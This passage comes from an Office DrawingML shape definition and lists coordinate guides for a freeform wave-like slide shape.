              <a:gd name="connsiteX77" fmla="*/ 11386973 w 12192000"/>
              <a:gd name="connsiteY77" fmla="*/ 708209 h 4939827"/>
              <a:gd name="connsiteX78" fmla="*/ 11500105 w 12192000"/>
              <a:gd name="connsiteY78" fmla="*/ 735014 h 4939827"/>
              <a:gd name="connsiteX79" fmla="*/ 11621735 w 12192000"/>
              <a:gd name="connsiteY79" fmla="*/ 789584 h 4939827"/>
              <a:gd name="connsiteX80" fmla="*/ 11691200 w 12192000"/>
              <a:gd name="connsiteY80" fmla="*/ 867902 h 4939827"/>
              <a:gd name="connsiteX81" fmla="*/ 11819427 w 12192000"/>
              <a:gd name="connsiteY81" fmla="*/ 911634 h 4939827"/>
              <a:gd name="connsiteX82" fmla="*/ 11969720 w 12192000"/>
              <a:gd name="connsiteY82" fmla="*/ 964737 h 4939827"/>
              <a:gd name="connsiteX83" fmla="*/ 12055766 w 12192000"/>
              <a:gd name="connsiteY83" fmla="*/ 991268 h 4939827"/>
              <a:gd name="connsiteX84" fmla="*/ 12171539 w 12192000"/>
              <a:gd name="connsiteY84" fmla="*/ 995427 h 4939827"/>
              <a:gd name="connsiteX85" fmla="*/ 12187831 w 12192000"/>
              <a:gd name="connsiteY85" fmla="*/ 996580 h 4939827"/>
              <a:gd name="connsiteX86" fmla="*/ 12192000 w 12192000"/>
              <a:gd name="connsiteY86" fmla="*/ 996726 h 4939827"/>
              <a:gd name="connsiteX87" fmla="*/ 12192000 w 12192000"/>
              <a:gd name="connsiteY87" fmla="*/ 4939827 h 4939827"/>
              <a:gd name="connsiteX88" fmla="*/ 0 w 12192000"/>
              <a:gd name="connsiteY88" fmla="*/ 4939827 h 4939827"/>
              <a:gd name="connsiteX89" fmla="*/ 0 w 12192000"/>
              <a:gd name="connsiteY89" fmla="*/ 512043 h 4939827"/>
              <a:gd name="connsiteX90" fmla="*/ 7381 w 12192000"/>
              <a:gd name="connsiteY90" fmla="*/ 512580 h 4939827"/>
              <a:gd name="connsiteX91" fmla="*/ 100029 w 12192000"/>
              <a:gd name="connsiteY91" fmla="*/ 504758 h 4939827"/>
              <a:gd name="connsiteX92" fmla="*/ 155244 w 12192000"/>
              <a:gd name="connsiteY92" fmla="*/ 525130 h 4939827"/>
              <a:gd name="connsiteX93" fmla="*/ 254366 w 12192000"/>
              <a:gd name="connsiteY93" fmla="*/ 534449 h 4939827"/>
              <a:gd name="connsiteX94" fmla="*/ 447292 w 12192000"/>
              <a:gd name="connsiteY94" fmla="*/ 542725 h 4939827"/>
              <a:gd name="connsiteX95" fmla="*/ 628105 w 12192000"/>
              <a:gd name="connsiteY95" fmla="*/ 547853 h 4939827"/>
              <a:gd name="connsiteX96" fmla="*/ 783146 w 12192000"/>
              <a:gd name="connsiteY96" fmla="*/ 591799 h 4939827"/>
              <a:gd name="connsiteX97" fmla="*/ 1043676 w 12192000"/>
              <a:gd name="connsiteY97" fmla="*/ 591887 h 4939827"/>
              <a:gd name="connsiteX98" fmla="*/ 1281816 w 12192000"/>
              <a:gd name="connsiteY98" fmla="*/ 520946 h 4939827"/>
              <a:gd name="connsiteX99" fmla="*/ 1486347 w 12192000"/>
              <a:gd name="connsiteY99" fmla="*/ 487310 h 4939827"/>
              <a:gd name="connsiteX100" fmla="*/ 1568079 w 12192000"/>
              <a:gd name="connsiteY100" fmla="*/ 462531 h 4939827"/>
              <a:gd name="connsiteX101" fmla="*/ 1622516 w 12192000"/>
              <a:gd name="connsiteY101" fmla="*/ 466058 h 4939827"/>
              <a:gd name="connsiteX102" fmla="*/ 1655457 w 12192000"/>
              <a:gd name="connsiteY102" fmla="*/ 465359 h 4939827"/>
              <a:gd name="connsiteX103" fmla="*/ 1717454 w 12192000"/>
              <a:gd name="connsiteY103" fmla="*/ 417203 h 4939827"/>
              <a:gd name="connsiteX104" fmla="*/ 1913794 w 12192000"/>
              <a:gd name="connsiteY104" fmla="*/ 365255 h 4939827"/>
              <a:gd name="connsiteX105" fmla="*/ 2129762 w 12192000"/>
              <a:gd name="connsiteY105" fmla="*/ 367832 h 4939827"/>
              <a:gd name="connsiteX106" fmla="*/ 2376970 w 12192000"/>
              <a:gd name="connsiteY106" fmla="*/ 350129 h 4939827"/>
              <a:gd name="connsiteX107" fmla="*/ 2480155 w 12192000"/>
              <a:gd name="connsiteY107" fmla="*/ 359227 h 4939827"/>
              <a:gd name="connsiteX108" fmla="*/ 2586782 w 12192000"/>
              <a:gd name="connsiteY108" fmla="*/ 339352 h 4939827"/>
              <a:gd name="connsiteX109" fmla="*/ 2679617 w 12192000"/>
              <a:gd name="connsiteY109" fmla="*/ 305383 h 4939827"/>
              <a:gd name="connsiteX110" fmla="*/ 2788947 w 12192000"/>
              <a:gd name="connsiteY110" fmla="*/ 250375 h 4939827"/>
              <a:gd name="connsiteX111" fmla="*/ 2965530 w 12192000"/>
              <a:gd name="connsiteY111" fmla="*/ 245958 h 4939827"/>
              <a:gd name="connsiteX112" fmla="*/ 3103677 w 12192000"/>
              <a:gd name="connsiteY112" fmla="*/ 209527 h 4939827"/>
              <a:gd name="connsiteX113" fmla="*/ 3126759 w 12192000"/>
              <a:gd name="connsiteY113" fmla="*/ 211226 h 4939827"/>
              <a:gd name="connsiteX114" fmla="*/ 3164020 w 12192000"/>
              <a:gd name="connsiteY114" fmla="*/ 212779 h 4939827"/>
              <a:gd name="connsiteX115" fmla="*/ 3285019 w 12192000"/>
              <a:gd name="connsiteY115" fmla="*/ 220535 h 4939827"/>
              <a:gd name="connsiteX116" fmla="*/ 3365154 w 12192000"/>
              <a:gd name="connsiteY116" fmla="*/ 226416 h 4939827"/>
              <a:gd name="connsiteX117" fmla="*/ 3367507 w 12192000"/>
              <a:gd name="connsiteY117" fmla="*/ 225416 h 4939827"/>
              <a:gd name="connsiteX118" fmla="*/ 3387567 w 12192000"/>
              <a:gd name="connsiteY118" fmla="*/ 227103 h 4939827"/>
              <a:gd name="connsiteX119" fmla="*/ 3498001 w 12192000"/>
              <a:gd name="connsiteY119" fmla="*/ 231941 h 4939827"/>
              <a:gd name="connsiteX120" fmla="*/ 3561557 w 12192000"/>
              <a:gd name="connsiteY120" fmla="*/ 228095 h 4939827"/>
              <a:gd name="connsiteX121" fmla="*/ 3611920 w 12192000"/>
              <a:gd name="connsiteY121" fmla="*/ 218094 h 4939827"/>
              <a:gd name="connsiteX122" fmla="*/ 3620528 w 12192000"/>
              <a:gd name="connsiteY122" fmla="*/ 218788 h 4939827"/>
              <a:gd name="connsiteX123" fmla="*/ 3620766 w 12192000"/>
              <a:gd name="connsiteY123" fmla="*/ 218511 h 4939827"/>
              <a:gd name="connsiteX124" fmla="*/ 3629977 w 12192000"/>
              <a:gd name="connsiteY124" fmla="*/ 218664 h 4939827"/>
              <a:gd name="connsiteX125" fmla="*/ 3636217 w 12192000"/>
              <a:gd name="connsiteY125" fmla="*/ 220048 h 4939827"/>
              <a:gd name="connsiteX126" fmla="*/ 3709484 w 12192000"/>
              <a:gd name="connsiteY126" fmla="*/ 186927 h 4939827"/>
              <a:gd name="connsiteX127" fmla="*/ 3761342 w 12192000"/>
              <a:gd name="connsiteY127" fmla="*/ 177474 h 4939827"/>
              <a:gd name="connsiteX128" fmla="*/ 3799748 w 12192000"/>
              <a:gd name="connsiteY128" fmla="*/ 167154 h 4939827"/>
              <a:gd name="connsiteX129" fmla="*/ 3922756 w 12192000"/>
              <a:gd name="connsiteY129" fmla="*/ 194044 h 4939827"/>
              <a:gd name="connsiteX130" fmla="*/ 4028476 w 12192000"/>
              <a:gd name="connsiteY130" fmla="*/ 223679 h 4939827"/>
              <a:gd name="connsiteX131" fmla="*/ 4191582 w 12192000"/>
              <a:gd name="connsiteY131" fmla="*/ 238952 h 4939827"/>
              <a:gd name="connsiteX132" fmla="*/ 4251024 w 12192000"/>
              <a:gd name="connsiteY132" fmla="*/ 240874 h 4939827"/>
              <a:gd name="connsiteX133" fmla="*/ 4355275 w 12192000"/>
              <a:gd name="connsiteY133" fmla="*/ 260205 h 4939827"/>
              <a:gd name="connsiteX134" fmla="*/ 4423807 w 12192000"/>
              <a:gd name="connsiteY134" fmla="*/ 270366 h 4939827"/>
              <a:gd name="connsiteX135" fmla="*/ 4558432 w 12192000"/>
              <a:gd name="connsiteY135" fmla="*/ 269194 h 4939827"/>
              <a:gd name="connsiteX136" fmla="*/ 4635061 w 12192000"/>
              <a:gd name="connsiteY136" fmla="*/ 280682 h 4939827"/>
              <a:gd name="connsiteX137" fmla="*/ 4807427 w 12192000"/>
              <a:gd name="connsiteY137" fmla="*/ 276835 h 4939827"/>
              <a:gd name="connsiteX138" fmla="*/ 5028933 w 12192000"/>
              <a:gd name="connsiteY138" fmla="*/ 183887 h 4939827"/>
              <a:gd name="connsiteX139" fmla="*/ 5093642 w 12192000"/>
              <a:gd name="connsiteY139" fmla="*/ 177214 h 4939827"/>
              <a:gd name="connsiteX140" fmla="*/ 5102642 w 12192000"/>
              <a:gd name="connsiteY140" fmla="*/ 186816 h 4939827"/>
              <a:gd name="connsiteX141" fmla="*/ 5193590 w 12192000"/>
              <a:gd name="connsiteY141" fmla="*/ 156458 h 4939827"/>
              <a:gd name="connsiteX142" fmla="*/ 5323922 w 12192000"/>
              <a:gd name="connsiteY142" fmla="*/ 146332 h 4939827"/>
              <a:gd name="connsiteX143" fmla="*/ 5421860 w 12192000"/>
              <a:gd name="connsiteY143" fmla="*/ 167298 h 4939827"/>
              <a:gd name="connsiteX144" fmla="*/ 5476948 w 12192000"/>
              <a:gd name="connsiteY144" fmla="*/ 173249 h 4939827"/>
              <a:gd name="connsiteX145" fmla="*/ 5516842 w 12192000"/>
              <a:gd name="connsiteY145" fmla="*/ 184018 h 4939827"/>
              <a:gd name="connsiteX146" fmla="*/ 5619415 w 12192000"/>
              <a:gd name="connsiteY146" fmla="*/ 176781 h 4939827"/>
              <a:gd name="connsiteX147" fmla="*/ 5789867 w 12192000"/>
              <a:gd name="connsiteY147" fmla="*/ 150304 h 4939827"/>
              <a:gd name="connsiteX148" fmla="*/ 5825953 w 12192000"/>
              <a:gd name="connsiteY148" fmla="*/ 147907 h 4939827"/>
              <a:gd name="connsiteX149" fmla="*/ 5856168 w 12192000"/>
              <a:gd name="connsiteY149" fmla="*/ 158719 h 4939827"/>
              <a:gd name="connsiteX150" fmla="*/ 5862476 w 12192000"/>
              <a:gd name="connsiteY150" fmla="*/ 172447 h 4939827"/>
              <a:gd name="connsiteX151" fmla="*/ 5882195 w 12192000"/>
              <a:gd name="connsiteY151" fmla="*/ 173195 h 4939827"/>
              <a:gd name="connsiteX152" fmla="*/ 5887271 w 12192000"/>
              <a:gd name="connsiteY152" fmla="*/ 176084 h 4939827"/>
              <a:gd name="connsiteX153" fmla="*/ 5921577 w 12192000"/>
              <a:gd name="connsiteY153" fmla="*/ 169858 h 4939827"/>
              <a:gd name="connsiteX154" fmla="*/ 5983240 w 12192000"/>
              <a:gd name="connsiteY154" fmla="*/ 152755 h 4939827"/>
              <a:gd name="connsiteX155" fmla="*/ 6152287 w 12192000"/>
              <a:gd name="connsiteY155" fmla="*/ 116736 h 4939827"/>
              <a:gd name="connsiteX156" fmla="*/ 6415830 w 12192000"/>
              <a:gd name="connsiteY156" fmla="*/ 136006 h 4939827"/>
              <a:gd name="connsiteX157" fmla="*/ 6756965 w 12192000"/>
              <a:gd name="connsiteY157" fmla="*/ 57636 h 4939827"/>
              <a:gd name="connsiteX158" fmla="*/ 6819400 w 12192000"/>
              <a:gd name="connsiteY158" fmla="*/ 30742 h 4939827"/>
              <a:gd name="connsiteX159" fmla="*/ 6986370 w 12192000"/>
              <a:gd name="connsiteY159" fmla="*/ 12659 h 4939827"/>
              <a:gd name="connsiteX160" fmla="*/ 6989536 w 12192000"/>
              <a:gd name="connsiteY160" fmla="*/ 14528 h 4939827"/>
              <a:gd name="connsiteX161" fmla="*/ 7015933 w 12192000"/>
              <a:gd name="connsiteY161" fmla="*/ 9653 h 4939827"/>
              <a:gd name="connsiteX162" fmla="*/ 7020592 w 12192000"/>
              <a:gd name="connsiteY162" fmla="*/ 1651 h 4939827"/>
              <a:gd name="connsiteX163" fmla="*/ 7025905 w 12192000"/>
              <a:gd name="connsiteY163"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152287 w 12192000"/>
              <a:gd name="connsiteY154" fmla="*/ 116736 h 4939827"/>
              <a:gd name="connsiteX155" fmla="*/ 6415830 w 12192000"/>
              <a:gd name="connsiteY155" fmla="*/ 136006 h 4939827"/>
              <a:gd name="connsiteX156" fmla="*/ 6756965 w 12192000"/>
              <a:gd name="connsiteY156" fmla="*/ 57636 h 4939827"/>
              <a:gd name="connsiteX157" fmla="*/ 6819400 w 12192000"/>
              <a:gd name="connsiteY157" fmla="*/ 30742 h 4939827"/>
              <a:gd name="connsiteX158" fmla="*/ 6986370 w 12192000"/>
              <a:gd name="connsiteY158" fmla="*/ 12659 h 4939827"/>
              <a:gd name="connsiteX159" fmla="*/ 6989536 w 12192000"/>
              <a:gd name="connsiteY159" fmla="*/ 14528 h 4939827"/>
              <a:gd name="connsiteX160" fmla="*/ 7015933 w 12192000"/>
              <a:gd name="connsiteY160" fmla="*/ 9653 h 4939827"/>
              <a:gd name="connsiteX161" fmla="*/ 7020592 w 12192000"/>
              <a:gd name="connsiteY161" fmla="*/ 1651 h 4939827"/>
              <a:gd name="connsiteX162" fmla="*/ 7025905 w 12192000"/>
              <a:gd name="connsiteY162"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5983240 w 12192000"/>
              <a:gd name="connsiteY153" fmla="*/ 152755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5921577 w 12192000"/>
              <a:gd name="connsiteY152" fmla="*/ 169858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887271 w 12192000"/>
              <a:gd name="connsiteY151" fmla="*/ 176084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01067 w 12192000"/>
              <a:gd name="connsiteY31" fmla="*/ 270114 h 4939827"/>
              <a:gd name="connsiteX32" fmla="*/ 8672650 w 12192000"/>
              <a:gd name="connsiteY32" fmla="*/ 254821 h 4939827"/>
              <a:gd name="connsiteX33" fmla="*/ 8785543 w 12192000"/>
              <a:gd name="connsiteY33" fmla="*/ 263406 h 4939827"/>
              <a:gd name="connsiteX34" fmla="*/ 8830588 w 12192000"/>
              <a:gd name="connsiteY34" fmla="*/ 265483 h 4939827"/>
              <a:gd name="connsiteX35" fmla="*/ 8905142 w 12192000"/>
              <a:gd name="connsiteY35" fmla="*/ 264958 h 4939827"/>
              <a:gd name="connsiteX36" fmla="*/ 8968582 w 12192000"/>
              <a:gd name="connsiteY36" fmla="*/ 262728 h 4939827"/>
              <a:gd name="connsiteX37" fmla="*/ 8972994 w 12192000"/>
              <a:gd name="connsiteY37" fmla="*/ 263284 h 4939827"/>
              <a:gd name="connsiteX38" fmla="*/ 9004605 w 12192000"/>
              <a:gd name="connsiteY38" fmla="*/ 258041 h 4939827"/>
              <a:gd name="connsiteX39" fmla="*/ 9016165 w 12192000"/>
              <a:gd name="connsiteY39" fmla="*/ 261258 h 4939827"/>
              <a:gd name="connsiteX40" fmla="*/ 9043297 w 12192000"/>
              <a:gd name="connsiteY40" fmla="*/ 281547 h 4939827"/>
              <a:gd name="connsiteX41" fmla="*/ 9048315 w 12192000"/>
              <a:gd name="connsiteY41" fmla="*/ 279264 h 4939827"/>
              <a:gd name="connsiteX42" fmla="*/ 9054706 w 12192000"/>
              <a:gd name="connsiteY42" fmla="*/ 278538 h 4939827"/>
              <a:gd name="connsiteX43" fmla="*/ 9070919 w 12192000"/>
              <a:gd name="connsiteY43" fmla="*/ 281810 h 4939827"/>
              <a:gd name="connsiteX44" fmla="*/ 9076813 w 12192000"/>
              <a:gd name="connsiteY44" fmla="*/ 283909 h 4939827"/>
              <a:gd name="connsiteX45" fmla="*/ 9085871 w 12192000"/>
              <a:gd name="connsiteY45" fmla="*/ 285133 h 4939827"/>
              <a:gd name="connsiteX46" fmla="*/ 9086159 w 12192000"/>
              <a:gd name="connsiteY46" fmla="*/ 284887 h 4939827"/>
              <a:gd name="connsiteX47" fmla="*/ 9134606 w 12192000"/>
              <a:gd name="connsiteY47" fmla="*/ 288168 h 4939827"/>
              <a:gd name="connsiteX48" fmla="*/ 9195590 w 12192000"/>
              <a:gd name="connsiteY48" fmla="*/ 279568 h 4939827"/>
              <a:gd name="connsiteX49" fmla="*/ 9219336 w 12192000"/>
              <a:gd name="connsiteY49" fmla="*/ 278133 h 4939827"/>
              <a:gd name="connsiteX50" fmla="*/ 9232362 w 12192000"/>
              <a:gd name="connsiteY50" fmla="*/ 275894 h 4939827"/>
              <a:gd name="connsiteX51" fmla="*/ 9233396 w 12192000"/>
              <a:gd name="connsiteY51" fmla="*/ 274803 h 4939827"/>
              <a:gd name="connsiteX52" fmla="*/ 9256213 w 12192000"/>
              <a:gd name="connsiteY52" fmla="*/ 281576 h 4939827"/>
              <a:gd name="connsiteX53" fmla="*/ 9371484 w 12192000"/>
              <a:gd name="connsiteY53" fmla="*/ 329634 h 4939827"/>
              <a:gd name="connsiteX54" fmla="*/ 9404829 w 12192000"/>
              <a:gd name="connsiteY54" fmla="*/ 339038 h 4939827"/>
              <a:gd name="connsiteX55" fmla="*/ 9427021 w 12192000"/>
              <a:gd name="connsiteY55" fmla="*/ 358784 h 4939827"/>
              <a:gd name="connsiteX56" fmla="*/ 9670844 w 12192000"/>
              <a:gd name="connsiteY56" fmla="*/ 405128 h 4939827"/>
              <a:gd name="connsiteX57" fmla="*/ 9816083 w 12192000"/>
              <a:gd name="connsiteY57" fmla="*/ 416573 h 4939827"/>
              <a:gd name="connsiteX58" fmla="*/ 9936741 w 12192000"/>
              <a:gd name="connsiteY58" fmla="*/ 437044 h 4939827"/>
              <a:gd name="connsiteX59" fmla="*/ 10050093 w 12192000"/>
              <a:gd name="connsiteY59" fmla="*/ 443783 h 4939827"/>
              <a:gd name="connsiteX60" fmla="*/ 10130090 w 12192000"/>
              <a:gd name="connsiteY60" fmla="*/ 459520 h 4939827"/>
              <a:gd name="connsiteX61" fmla="*/ 10173456 w 12192000"/>
              <a:gd name="connsiteY61" fmla="*/ 457749 h 4939827"/>
              <a:gd name="connsiteX62" fmla="*/ 10218232 w 12192000"/>
              <a:gd name="connsiteY62" fmla="*/ 459820 h 4939827"/>
              <a:gd name="connsiteX63" fmla="*/ 10354176 w 12192000"/>
              <a:gd name="connsiteY63" fmla="*/ 471377 h 4939827"/>
              <a:gd name="connsiteX64" fmla="*/ 10430681 w 12192000"/>
              <a:gd name="connsiteY64" fmla="*/ 481226 h 4939827"/>
              <a:gd name="connsiteX65" fmla="*/ 10478169 w 12192000"/>
              <a:gd name="connsiteY65" fmla="*/ 481774 h 4939827"/>
              <a:gd name="connsiteX66" fmla="*/ 10540907 w 12192000"/>
              <a:gd name="connsiteY66" fmla="*/ 485607 h 4939827"/>
              <a:gd name="connsiteX67" fmla="*/ 10614941 w 12192000"/>
              <a:gd name="connsiteY67" fmla="*/ 487592 h 4939827"/>
              <a:gd name="connsiteX68" fmla="*/ 10674098 w 12192000"/>
              <a:gd name="connsiteY68" fmla="*/ 521656 h 4939827"/>
              <a:gd name="connsiteX69" fmla="*/ 10874834 w 12192000"/>
              <a:gd name="connsiteY69" fmla="*/ 574867 h 4939827"/>
              <a:gd name="connsiteX70" fmla="*/ 10944981 w 12192000"/>
              <a:gd name="connsiteY70" fmla="*/ 615042 h 4939827"/>
              <a:gd name="connsiteX71" fmla="*/ 11006376 w 12192000"/>
              <a:gd name="connsiteY71" fmla="*/ 645957 h 4939827"/>
              <a:gd name="connsiteX72" fmla="*/ 11076308 w 12192000"/>
              <a:gd name="connsiteY72" fmla="*/ 675698 h 4939827"/>
              <a:gd name="connsiteX73" fmla="*/ 11148789 w 12192000"/>
              <a:gd name="connsiteY73" fmla="*/ 685041 h 4939827"/>
              <a:gd name="connsiteX74" fmla="*/ 11249129 w 12192000"/>
              <a:gd name="connsiteY74" fmla="*/ 684218 h 4939827"/>
              <a:gd name="connsiteX75" fmla="*/ 11299915 w 12192000"/>
              <a:gd name="connsiteY75" fmla="*/ 692177 h 4939827"/>
              <a:gd name="connsiteX76" fmla="*/ 11386973 w 12192000"/>
              <a:gd name="connsiteY76" fmla="*/ 708209 h 4939827"/>
              <a:gd name="connsiteX77" fmla="*/ 11500105 w 12192000"/>
              <a:gd name="connsiteY77" fmla="*/ 735014 h 4939827"/>
              <a:gd name="connsiteX78" fmla="*/ 11621735 w 12192000"/>
              <a:gd name="connsiteY78" fmla="*/ 789584 h 4939827"/>
              <a:gd name="connsiteX79" fmla="*/ 11691200 w 12192000"/>
              <a:gd name="connsiteY79" fmla="*/ 867902 h 4939827"/>
              <a:gd name="connsiteX80" fmla="*/ 11819427 w 12192000"/>
              <a:gd name="connsiteY80" fmla="*/ 911634 h 4939827"/>
              <a:gd name="connsiteX81" fmla="*/ 11969720 w 12192000"/>
              <a:gd name="connsiteY81" fmla="*/ 964737 h 4939827"/>
              <a:gd name="connsiteX82" fmla="*/ 12055766 w 12192000"/>
              <a:gd name="connsiteY82" fmla="*/ 991268 h 4939827"/>
              <a:gd name="connsiteX83" fmla="*/ 12171539 w 12192000"/>
              <a:gd name="connsiteY83" fmla="*/ 995427 h 4939827"/>
              <a:gd name="connsiteX84" fmla="*/ 12187831 w 12192000"/>
              <a:gd name="connsiteY84" fmla="*/ 996580 h 4939827"/>
              <a:gd name="connsiteX85" fmla="*/ 12192000 w 12192000"/>
              <a:gd name="connsiteY85" fmla="*/ 996726 h 4939827"/>
              <a:gd name="connsiteX86" fmla="*/ 12192000 w 12192000"/>
              <a:gd name="connsiteY86" fmla="*/ 4939827 h 4939827"/>
              <a:gd name="connsiteX87" fmla="*/ 0 w 12192000"/>
              <a:gd name="connsiteY87" fmla="*/ 4939827 h 4939827"/>
              <a:gd name="connsiteX88" fmla="*/ 0 w 12192000"/>
              <a:gd name="connsiteY88" fmla="*/ 512043 h 4939827"/>
              <a:gd name="connsiteX89" fmla="*/ 7381 w 12192000"/>
              <a:gd name="connsiteY89" fmla="*/ 512580 h 4939827"/>
              <a:gd name="connsiteX90" fmla="*/ 100029 w 12192000"/>
              <a:gd name="connsiteY90" fmla="*/ 504758 h 4939827"/>
              <a:gd name="connsiteX91" fmla="*/ 155244 w 12192000"/>
              <a:gd name="connsiteY91" fmla="*/ 525130 h 4939827"/>
              <a:gd name="connsiteX92" fmla="*/ 254366 w 12192000"/>
              <a:gd name="connsiteY92" fmla="*/ 534449 h 4939827"/>
              <a:gd name="connsiteX93" fmla="*/ 447292 w 12192000"/>
              <a:gd name="connsiteY93" fmla="*/ 542725 h 4939827"/>
              <a:gd name="connsiteX94" fmla="*/ 628105 w 12192000"/>
              <a:gd name="connsiteY94" fmla="*/ 547853 h 4939827"/>
              <a:gd name="connsiteX95" fmla="*/ 783146 w 12192000"/>
              <a:gd name="connsiteY95" fmla="*/ 591799 h 4939827"/>
              <a:gd name="connsiteX96" fmla="*/ 1043676 w 12192000"/>
              <a:gd name="connsiteY96" fmla="*/ 591887 h 4939827"/>
              <a:gd name="connsiteX97" fmla="*/ 1281816 w 12192000"/>
              <a:gd name="connsiteY97" fmla="*/ 520946 h 4939827"/>
              <a:gd name="connsiteX98" fmla="*/ 1486347 w 12192000"/>
              <a:gd name="connsiteY98" fmla="*/ 487310 h 4939827"/>
              <a:gd name="connsiteX99" fmla="*/ 1568079 w 12192000"/>
              <a:gd name="connsiteY99" fmla="*/ 462531 h 4939827"/>
              <a:gd name="connsiteX100" fmla="*/ 1622516 w 12192000"/>
              <a:gd name="connsiteY100" fmla="*/ 466058 h 4939827"/>
              <a:gd name="connsiteX101" fmla="*/ 1655457 w 12192000"/>
              <a:gd name="connsiteY101" fmla="*/ 465359 h 4939827"/>
              <a:gd name="connsiteX102" fmla="*/ 1717454 w 12192000"/>
              <a:gd name="connsiteY102" fmla="*/ 417203 h 4939827"/>
              <a:gd name="connsiteX103" fmla="*/ 1913794 w 12192000"/>
              <a:gd name="connsiteY103" fmla="*/ 365255 h 4939827"/>
              <a:gd name="connsiteX104" fmla="*/ 2129762 w 12192000"/>
              <a:gd name="connsiteY104" fmla="*/ 367832 h 4939827"/>
              <a:gd name="connsiteX105" fmla="*/ 2376970 w 12192000"/>
              <a:gd name="connsiteY105" fmla="*/ 350129 h 4939827"/>
              <a:gd name="connsiteX106" fmla="*/ 2480155 w 12192000"/>
              <a:gd name="connsiteY106" fmla="*/ 359227 h 4939827"/>
              <a:gd name="connsiteX107" fmla="*/ 2586782 w 12192000"/>
              <a:gd name="connsiteY107" fmla="*/ 339352 h 4939827"/>
              <a:gd name="connsiteX108" fmla="*/ 2679617 w 12192000"/>
              <a:gd name="connsiteY108" fmla="*/ 305383 h 4939827"/>
              <a:gd name="connsiteX109" fmla="*/ 2788947 w 12192000"/>
              <a:gd name="connsiteY109" fmla="*/ 250375 h 4939827"/>
              <a:gd name="connsiteX110" fmla="*/ 2965530 w 12192000"/>
              <a:gd name="connsiteY110" fmla="*/ 245958 h 4939827"/>
              <a:gd name="connsiteX111" fmla="*/ 3103677 w 12192000"/>
              <a:gd name="connsiteY111" fmla="*/ 209527 h 4939827"/>
              <a:gd name="connsiteX112" fmla="*/ 3126759 w 12192000"/>
              <a:gd name="connsiteY112" fmla="*/ 211226 h 4939827"/>
              <a:gd name="connsiteX113" fmla="*/ 3164020 w 12192000"/>
              <a:gd name="connsiteY113" fmla="*/ 212779 h 4939827"/>
              <a:gd name="connsiteX114" fmla="*/ 3285019 w 12192000"/>
              <a:gd name="connsiteY114" fmla="*/ 220535 h 4939827"/>
              <a:gd name="connsiteX115" fmla="*/ 3365154 w 12192000"/>
              <a:gd name="connsiteY115" fmla="*/ 226416 h 4939827"/>
              <a:gd name="connsiteX116" fmla="*/ 3367507 w 12192000"/>
              <a:gd name="connsiteY116" fmla="*/ 225416 h 4939827"/>
              <a:gd name="connsiteX117" fmla="*/ 3387567 w 12192000"/>
              <a:gd name="connsiteY117" fmla="*/ 227103 h 4939827"/>
              <a:gd name="connsiteX118" fmla="*/ 3498001 w 12192000"/>
              <a:gd name="connsiteY118" fmla="*/ 231941 h 4939827"/>
              <a:gd name="connsiteX119" fmla="*/ 3561557 w 12192000"/>
              <a:gd name="connsiteY119" fmla="*/ 228095 h 4939827"/>
              <a:gd name="connsiteX120" fmla="*/ 3611920 w 12192000"/>
              <a:gd name="connsiteY120" fmla="*/ 218094 h 4939827"/>
              <a:gd name="connsiteX121" fmla="*/ 3620528 w 12192000"/>
              <a:gd name="connsiteY121" fmla="*/ 218788 h 4939827"/>
              <a:gd name="connsiteX122" fmla="*/ 3620766 w 12192000"/>
              <a:gd name="connsiteY122" fmla="*/ 218511 h 4939827"/>
              <a:gd name="connsiteX123" fmla="*/ 3629977 w 12192000"/>
              <a:gd name="connsiteY123" fmla="*/ 218664 h 4939827"/>
              <a:gd name="connsiteX124" fmla="*/ 3636217 w 12192000"/>
              <a:gd name="connsiteY124" fmla="*/ 220048 h 4939827"/>
              <a:gd name="connsiteX125" fmla="*/ 3709484 w 12192000"/>
              <a:gd name="connsiteY125" fmla="*/ 186927 h 4939827"/>
              <a:gd name="connsiteX126" fmla="*/ 3761342 w 12192000"/>
              <a:gd name="connsiteY126" fmla="*/ 177474 h 4939827"/>
              <a:gd name="connsiteX127" fmla="*/ 3799748 w 12192000"/>
              <a:gd name="connsiteY127" fmla="*/ 167154 h 4939827"/>
              <a:gd name="connsiteX128" fmla="*/ 3922756 w 12192000"/>
              <a:gd name="connsiteY128" fmla="*/ 194044 h 4939827"/>
              <a:gd name="connsiteX129" fmla="*/ 4028476 w 12192000"/>
              <a:gd name="connsiteY129" fmla="*/ 223679 h 4939827"/>
              <a:gd name="connsiteX130" fmla="*/ 4191582 w 12192000"/>
              <a:gd name="connsiteY130" fmla="*/ 238952 h 4939827"/>
              <a:gd name="connsiteX131" fmla="*/ 4251024 w 12192000"/>
              <a:gd name="connsiteY131" fmla="*/ 240874 h 4939827"/>
              <a:gd name="connsiteX132" fmla="*/ 4355275 w 12192000"/>
              <a:gd name="connsiteY132" fmla="*/ 260205 h 4939827"/>
              <a:gd name="connsiteX133" fmla="*/ 4423807 w 12192000"/>
              <a:gd name="connsiteY133" fmla="*/ 270366 h 4939827"/>
              <a:gd name="connsiteX134" fmla="*/ 4558432 w 12192000"/>
              <a:gd name="connsiteY134" fmla="*/ 269194 h 4939827"/>
              <a:gd name="connsiteX135" fmla="*/ 4635061 w 12192000"/>
              <a:gd name="connsiteY135" fmla="*/ 280682 h 4939827"/>
              <a:gd name="connsiteX136" fmla="*/ 4807427 w 12192000"/>
              <a:gd name="connsiteY136" fmla="*/ 276835 h 4939827"/>
              <a:gd name="connsiteX137" fmla="*/ 5028933 w 12192000"/>
              <a:gd name="connsiteY137" fmla="*/ 183887 h 4939827"/>
              <a:gd name="connsiteX138" fmla="*/ 5093642 w 12192000"/>
              <a:gd name="connsiteY138" fmla="*/ 177214 h 4939827"/>
              <a:gd name="connsiteX139" fmla="*/ 5102642 w 12192000"/>
              <a:gd name="connsiteY139" fmla="*/ 186816 h 4939827"/>
              <a:gd name="connsiteX140" fmla="*/ 5193590 w 12192000"/>
              <a:gd name="connsiteY140" fmla="*/ 156458 h 4939827"/>
              <a:gd name="connsiteX141" fmla="*/ 5323922 w 12192000"/>
              <a:gd name="connsiteY141" fmla="*/ 146332 h 4939827"/>
              <a:gd name="connsiteX142" fmla="*/ 5421860 w 12192000"/>
              <a:gd name="connsiteY142" fmla="*/ 167298 h 4939827"/>
              <a:gd name="connsiteX143" fmla="*/ 5476948 w 12192000"/>
              <a:gd name="connsiteY143" fmla="*/ 173249 h 4939827"/>
              <a:gd name="connsiteX144" fmla="*/ 5516842 w 12192000"/>
              <a:gd name="connsiteY144" fmla="*/ 184018 h 4939827"/>
              <a:gd name="connsiteX145" fmla="*/ 5619415 w 12192000"/>
              <a:gd name="connsiteY145" fmla="*/ 176781 h 4939827"/>
